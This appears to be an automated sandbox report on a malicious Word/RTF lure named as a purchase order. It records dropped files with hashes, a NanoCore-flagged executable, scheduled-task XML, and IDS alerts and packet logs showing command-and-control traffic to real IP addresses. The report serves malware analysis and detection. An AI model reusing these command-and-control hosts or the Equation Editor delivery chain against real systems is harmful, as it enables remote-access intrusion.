C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FDB545E2-A1F4-4D0B-9DE9-98A3C665B689}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	3.5491610599231906
Encrypted:	false
SSDEEP:	192:m5LphByRqQSOy7ShYklVA0oOF+ipgD+hVaiSrt0ANCnZ:IDByRhS6ZqaleD+zafrOnZ
MD5:	D7DB044F16D218F1EADE480EF8488782
SHA1:	80F889F3367A3CF553EB1FB5058E8359EE968D76
SHA-256:	3870E6C567CE9AF3766D2512863098D2E7707FC102551EDA2B82AD031DC9EA88
SHA-512:	3F1CACC2E5E2C20959267FF7BBED5CCD063B0404B27D6916BE52289527A595EA33CA51F051C31A2514B923AEDC029734020017DBBC2E25D18F3A2BC79309CE52
Malicious:	false
Preview:	?.[.~./.\|.~.:.#.[.`.?.?.?.!.?.9.#.-.@.%.^.8.8.>...`.-.,.-.&.].6.(.7.4.;.[.(.\|.8.).+.-.3.>.2.3.8.:.>.].?.0.%.9...9.#.$.,.^.=.?.%.3.6.2.].\|.0...].8._.9.\|.../.7.;...1.@.%.0.,.<.?...[.~...9.?.:.?./.~..`.9.^.?.=.-.?.@.8.7.>.$.#.=.1.4._.?.!.+.?.(.:.-./.].=.#.?.^...9.?.4.].[.^.?.?.8.~.%.[.!.9.3.?.'.!.!.?.~.:.?.<...'.?.].8.:.%.:.9.?...\|...^.$...0.?.0.?.?.8.8.5.9.6.!.;.%.'.9.).$.?.^.7.&.7.,.?.2...:.,.-.<.?.6.%...).,.2.'.8.%.+.\|.0.).'.[.'...<.?.).?.3...4.!.5._.~.9.%.%.4...?.&.+.@.^.&.%.,.,.@.:.%.`.;.^.0.?.+.,.?.1.2...6.].3.:.@...5.;.#.?.$.!.]...^.:.?...$...6.....#.2.6.`.!.?.;.[...&..(..&.;.[.?.;.<.&...8.].#.5.+.6...`...%.%.6...\|.0.`.,.#.?.#.?.].%.~.?.).`.:.?.[.#.4.?.).,.?.4.;.?.$.6.?...@.:.%.!.-.<.`.:.;.~.<...~.^.........@._.3.9.?.~.3.2.-.+.?.@.$.3.2.8.....%.$.7.^.@.+.@.3...(.!...?.1.&.^._.<.=.#.(.&.?.:.?.^.].5.?.!._..;.\|.$.7.3...~...%.>.`.$.>.3.?.+.4..?...~.&..&.:.4.'.?.<.6.+.%.5.._....._.;.&.?.%.5.\|.!...@..,.7.5.2.6.'.=...\|.%.<.$.-.;.%.4.~.?.0.3.!.).4.-.9.6.5.(...5.0.;.%.`.>.9.9.%.^./.

C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp Download File
Process:	C:\Users\user\AppData\Roaming\cat464923.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.1063907901076036
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
MD5:	CFAE5A3B7D8AA9653FE2512578A0D23A
SHA1:	A91A2F8DAEF114F89038925ADA6784646A0A5B12
SHA-256:	2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
SHA-512:	9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp60E5.tmp Download File
Process:	C:\Users\user\AppData\Roaming\cat464923.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1307
Entropy (8bit):	5.11622825321337
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Mlxtn:cbk4oL600QydbQxIYODOLedq31lj
MD5:	E9158E1A9544A814D85FF71A063D4897
SHA1:	379599BA98CEF1C4C94DA8C161BC6AE079567A4F
SHA-256:	4750AC37882AF0C03A0BDAD6FAA7E2EF686F453BA84C993E975C5EBC59CC4C0F
SHA-512:	11A51FF9EF351320038E7941E224234664378C1E2CDC91B270164628C67419816F37E6F65F7A3EE05F47D12E1E0D51BE3478A49E30037DA1B003673DD8DF0616
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat Download File
Process:	C:\Users\user\AppData\Roaming\cat464923.exe
File Type:	data
Category:	dropped
Size (bytes):	3016
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknl:HjhDjhDjhDjhDjhDjhDjhDjhDjhDjhDh
MD5:	A251FC139907A7F9A4D54A3DFC994A60
SHA1:	E9B3F45B76DF6AB458B51B6AA5B15D70CB49190E
SHA-256:	51676284C24A71DCEC3BB438090D811AB88DF0D91A9B3BAFCBAED1E74EAB2D9E
SHA-512:	445B9ABAAAF655E86706EDCB1CD034210067564CF07C5B8B7C2AE2BBA71D3043CCFAE953387906B7D6003C6417BF804BA5BBD770A3AC4648EA8A24E154FD021A
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Users\user\AppData\Roaming\cat464923.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:0tn:Un
MD5:	8E46E8E73444D3232C1BCB6EA5499811
SHA1:	271C8FBF4BCDAD52009AC3D4A90566F9B899E730
SHA-256:	4FF23F74BE21A8679B61FFE38B08138571061ADC93AF3DAFDE0BBD7796F00EAC
SHA-512:	977448FA0F3F9103978DCAD4AC8AA99EB445C210A859C1A245F3971A85C7B263829E31401A2F30BD43C9ABC8AB37A2816436A06EC434F37F405DE77DC11E768E
Malicious:	true
Preview:	..G.U+.H

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat Download File
Process:	C:\Users\user\AppData\Roaming\cat464923.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.615808539574485
Encrypted:	false
SSDEEP:	3:oNXp4EaKC5TrJ:oNPaZ5PJ
MD5:	E0100B0629DC86B2FAA2F6CC3E4D0282
SHA1:	3AC336D4BED5B15DFE1ED5C918CC07E86BDFEE5D
SHA-256:	E7ED716AB3AD0130F60C70182EAD3737668DA69DB5883DF619A3DC272C3A1D5F
SHA-512:	11C0DB4012D5C75F098B951FBE4CF819B3A24B607F29ADAF87597484F4CD1D4BD2F6996B189DCB15A75ED5F95D5FB75B4BBD2D9807B6D6BE995209EBE364C272
Malicious:	false
Preview:	C:\Users\user\AppData\Roaming\cat464923.exe

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NEW ORDER Ref PO-298721.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jun 9 13:47:34 2021, length=9110, window=hide
Category:	dropped
Size (bytes):	2158
Entropy (8bit):	4.546392079368718
Encrypted:	false
SSDEEP:	48:8wyq3k/XTFGqYFXjKQh2wyq3k/XTFGqYFXjKQ/:8h/XJGqkjKQh2h/XJGqkjKQ/
MD5:	3AFEA8D74F1423C04D96E329BA82C13B
SHA1:	876A8DB87EAA5BED07F7AEE79AA06E0340F91436
SHA-256:	C3DA53E4301ADFFBB6D730B868F678DF5A22325943EDD8CC1B6E39A5B0750478
SHA-512:	98F50994B8F3691B6EECB44E0190821F0FDBEF899D0AFA06BA47A433B810A2B5E38E84C4E0FF4CEA4DC2078C0288DC697665E84013C09A4A6280C55DFDD0AEF0
Malicious:	false
Preview:	L..................F.... ........{.......{..XpNb>]...#...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..#...R.u .NEWORD~1.DOC..d.......Q.y.Q.y...8.....................N.E.W. .O.R.D.E.R. .R.e.f. .P.O.-.2.9.8.7.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\NEW ORDER Ref PO-298721.doc.2.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.E.W. .O.R.D.E.R. .R.e.f. .P.O.-.2.9.8.7.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......21604

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	107
Entropy (8bit):	4.651370317946986
Encrypted:	false
SSDEEP:	3:M1LC1enddd6lzy1enddd6lmX1LC1enddd6lv:MVC1eXAhy1eXAIC1eXA1
MD5:	4D93A2785BCE946FB1171E25002A6A58
SHA1:	3328DD2F9DC8901191DF46A6F92ED1051134731D
SHA-256:	2BAB3005BA2513E26401F3CA6BF79A8E0B8DFF73CA2107F3F3E401D84867D9E9
SHA-512:	6DA2445F0CCE8D915D11D0382C8821DBAA37E3C5146F076637414B2A8F4088E901950DAB77C84430AC907B6462F20E9DF9A52DCFA2834BA4D7C32EBD4A142BA4
Malicious:	false
Preview:	[doc]..NEW ORDER Ref PO-298721.LNK=0..NEW ORDER Ref PO-298721.LNK=0..[doc]..NEW ORDER Ref PO-298721.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\cat464923.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	736256
Entropy (8bit):	7.59865760202799
Encrypted:	false
SSDEEP:	6144:x2j8F5ve0At+vWlrOXMRzyeYlDW6PzaIm8MI8x39qflzAQnT6kygum2OMidd8P99:sj8FU9qXKueqZPeLhI8N0MQn5zdd8ld
MD5:	61DE33A77D34A313DF07DC2BDD28140A
SHA1:	2690F84ADB2C6174AAB432A61737CA892AF2D206
SHA-256:	9037AFBF6A54684A77A6D0B204DAA0A843555E01A9BD600545D8AE252B88FAD7
SHA-512:	9AAD4399FB37F78D1E658006EFDFE218607F51D630496CE7FBC1766BDD78B8F360657C8A661CF48602105F5C7D7A9C772180D5307BC3B9D5E2D2DE2CDB24E4C1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.`..............0..2...........Q... ...`....@.. ....................................@.................................pQ..O....`..............................8P............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................Q......H...................k....x................................................r...p}......}.....(.......(.......0..?.........{....o....r[..p(....-\.{....o....r[..p(....-E.{....o....r[..p(....-..{....o....r[..p(....-..{....o....r[..p(....+......,..r]..p(....&8.....{....s........=...%.ry..p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%...{....o.....%..r...p.(.......s......o......o.....r...p(....&...(.......*....0..+.........,..{......

C:\Users\user\Desktop\~$W ORDER Ref PO-298721.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	5.533845155224517
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	NEW ORDER Ref PO-298721.doc
File size:	9110
MD5:	f343ce75606d600a978f4593ad92a5ed
SHA1:	0aca94dd295f12f4deb4505a3f3dd470a7a59752
SHA256:	194abfeb6f78221b43aff1da8d0aceead6282979840d9aa43bfc20d190ba0ddd
SHA512:	37f8e5fd0e149730e9c284624bd622f9d483bd70e62030d218b57bf94eb482a50b1927e5178058ce520e2ab9b044afbb0df91d61aa9979f853f0fc3e43101e8a
SSDEEP:	192:I65CImFOF3MFn290lbwj5COBIaL4Ieor81AiWUKFaaNf7WER:d5hmFOF3stgh7SWtF3Nf7WER
File Content Preview:	{\rtf8932?[~/\|~:#[`???!?9#-@%^88>.`-,-&]6(74;[(\|8)+-3>238:>]?0%9.9#$,^=?%362]\|0.]8_9\|./7;.1@%0,<?.[~.9?:?/~*`9^?=-?@87>$#=14_?!+?(:-/]=#?^.9?4][^??8~%[!93?'!!?~:?<.'?]8:%:9?.\|.^$.0?0??88596!;%'9)$?^7&7,?2.:,-<?6%.),2'8%+\|0)'['.<?)?3.4!5_~9%%4.?&+@^&%,,@:%

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000011B6h								no
1	0000115Ah	2	embedded	equATIon.3	1634				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/09/21-07:48:04.731109	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	53099	37.235.1.174	192.168.2.22
06/09/21-07:48:04.833187	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	53099	37.235.1.174	192.168.2.22
06/09/21-07:48:04.886828	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	53099	37.235.1.174	192.168.2.22
06/09/21-07:48:05.307066	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49168	1665	192.168.2.22	103.133.106.117
06/09/21-07:48:11.626167	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49169	1665	192.168.2.22	103.133.106.117
06/09/21-07:48:17.936875	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49170	1665	192.168.2.22	103.133.106.117
06/09/21-07:48:27.253207	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49171	1665	192.168.2.22	103.133.106.117
06/09/21-07:48:58.351184	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49172	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:04.309087	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56009	37.235.1.174	192.168.2.22
06/09/21-07:49:04.365986	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56009	37.235.1.174	192.168.2.22
06/09/21-07:49:04.507223	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56009	37.235.1.174	192.168.2.22
06/09/21-07:49:04.570237	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56009	37.235.1.174	192.168.2.22
06/09/21-07:49:04.882947	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49173	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:14.814960	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49174	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:21.601020	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52496	37.235.1.177	192.168.2.22
06/09/21-07:49:21.657059	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52496	37.235.1.177	192.168.2.22
06/09/21-07:49:21.967603	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49175	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:28.328855	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49176	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:35.324373	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49177	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:41.784821	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49178	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:48.227578	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49179	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:55.435518	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49180	1665	192.168.2.22	103.133.106.117
06/09/21-07:49:55.586394	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	37.235.1.174
06/09/21-07:50:01.758897	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49181	1665	192.168.2.22	103.133.106.117

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 07:47:55.374442101 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.425745964 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.426067114 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.426242113 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.477076054 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477751970 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477782011 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477808952 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477833033 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477858067 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477880955 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477904081 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477961063 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.477987051 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.478009939 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.478091002 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.478115082 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.485929966 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528103113 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528140068 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528161049 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528162956 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528177977 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528186083 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528193951 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528208017 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528229952 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528239965 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528244019 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528250933 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528279066 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528284073 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528311968 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528337002 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528359890 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528378010 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528381109 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528383017 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528403997 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528412104 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528415918 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528425932 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528458118 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528464079 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528465986 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528490067 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528513908 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528515100 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528520107 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528537035 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528552055 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528558016 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528580904 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528584957 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528589010 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528603077 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.528626919 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.528630972 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.529864073 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.580044985 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580073118 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580089092 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580105066 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580132008 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.580168962 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.580802917 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580823898 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580869913 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.580881119 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.580902100 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580935001 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.580969095 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.580981016 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.580981016 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581022024 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581084967 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581099033 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581139088 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581157923 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581176996 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581182957 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581193924 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581198931 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581204891 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581219912 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581260920 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581286907 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581296921 CEST	49167	80	192.168.2.22	185.239.243.112
